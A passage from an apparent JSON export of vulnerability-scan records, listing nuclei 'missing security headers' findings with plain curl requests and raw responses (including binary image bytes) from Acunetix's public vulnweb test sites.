/�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 998, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:48.387Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 999, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:48.693Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1000, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:49.011Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1001, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:49.330Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> 